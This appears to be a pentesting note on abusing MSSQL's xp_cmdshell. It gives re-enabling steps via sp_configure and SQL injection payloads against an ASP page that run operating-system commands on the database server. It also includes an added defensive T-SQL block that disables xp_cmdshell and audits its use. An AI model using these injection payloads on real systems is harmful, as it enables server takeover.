MSSQL's xp_cmdshell extension
Introduction
xp_cmdshell extension: a stored procedure that executes a command string as an operating-system command in a shell and returns all output as lines of text.
Determine whether the current MSSQL instance has xp_cmdshell; a return value of 1 indicates the xp_cmdshell extension exists.
code: select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
Test whether it can execute a system command:
exec master..xp_cmdshell 'net user'
exec master.dbo.xp_cmdshell 'net user'
If this returns an error:
- workaround
- exec sp_configure 'show advanced options',1;
- reconfigure
- exec sp_configure 'xp_cmdshell',1;
- reconfigure
sp_configure is a stored procedure used to modify system configuration options. To modify advanced options, the 'show advanced options' parameter must first be set to 1 (and a reconfigure run so that the new value takes effect).
The next sp_configure call then modifies the advanced option 'xp_cmdshell' and sets it to 1, which allows SQL Server to execute operating-system commands outside of the database.
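As an added example (not part of the original notes), the defender-side counterpart of the workaround above: T-SQL to check whether xp_cmdshell is enabled, turn it back off, and record any batch that calls xp_cmdshell or sp_configure. The session name audit_xp_cmdshell and the file path C:\XE\ are assumptions; it must be run by a sysadmin login.

```sql
-- Added example, not from the original notes. Assumes a sysadmin login.

-- 1. Is xp_cmdshell currently enabled? value_in_use = 1 means enabled.
SELECT name, value, value_in_use, is_advanced
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Is a proxy credential defined? Without it, only sysadmin logins can
--    call xp_cmdshell (it then runs as the SQL Server service account).
SELECT name, credential_identity, create_date
FROM sys.credentials
WHERE name = '##xp_cmdshell_proxy_account##';

-- 3. Disable xp_cmdshell: the inverse of the workaround above. The option
--    is only visible to sp_configure after 'show advanced options' is in use.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
GO

-- 4. Detection: an Extended Events session that records every completed
--    batch whose text mentions xp_cmdshell or sp_configure, together with
--    the login, client host and application. Path is a placeholder.
IF EXISTS (SELECT 1 FROM sys.server_event_sessions WHERE name = 'audit_xp_cmdshell')
    DROP EVENT SESSION audit_xp_cmdshell ON SERVER;
GO
CREATE EVENT SESSION audit_xp_cmdshell ON SERVER
ADD EVENT sqlserver.sql_batch_completed (
    ACTION (sqlserver.sql_text, sqlserver.server_principal_name,
            sqlserver.client_hostname, sqlserver.client_app_name)
    WHERE sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_cmdshell%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%sp_configure%')
)
ADD TARGET package0.event_file (SET filename = N'C:\XE\audit_xp_cmdshell.xel')
WITH (STARTUP_STATE = ON);
GO
ALTER EVENT SESSION audit_xp_cmdshell ON SERVER STATE = START;
GO

-- 5. Review what was captured (the batch text sits inside the event XML).
SELECT CAST(event_data AS xml).value('(event/@timestamp)[1]', 'datetime2') AS ts,
       CAST(event_data AS xml).value('(event/action[@name="server_principal_name"]/value)[1]', 'sysname') AS login_name,
       CAST(event_data AS xml).value('(event/action[@name="sql_text"]/value)[1]', 'nvarchar(max)') AS batch_text
FROM sys.fn_xe_file_target_read_file('C:\XE\audit_xp_cmdshell*.xel', NULL, NULL, NULL);
```

A web application's login should never be sysadmin; if step 1 shows xp_cmdshell in use on an instance that a web app connects to, treat it as a finding even before the session records anything.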
Using xp_cmdshell to obtain a server shell
1. Determine whether xp_cmdshell is available:
asp?id=1' and (select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell') >0 -- (if the website's output is normal, the check succeeded)
2. Use xp_cmdshell to execute a system command:
asp?id=1';exec master.dbo.xp_cmdshell 'net user' --
Tips: after executing a command there is no normal output in the browser. As long as no error appears, the command has been executed successfully.
The most important point is that any command can be placed after master.dbo.xp_cmdshell.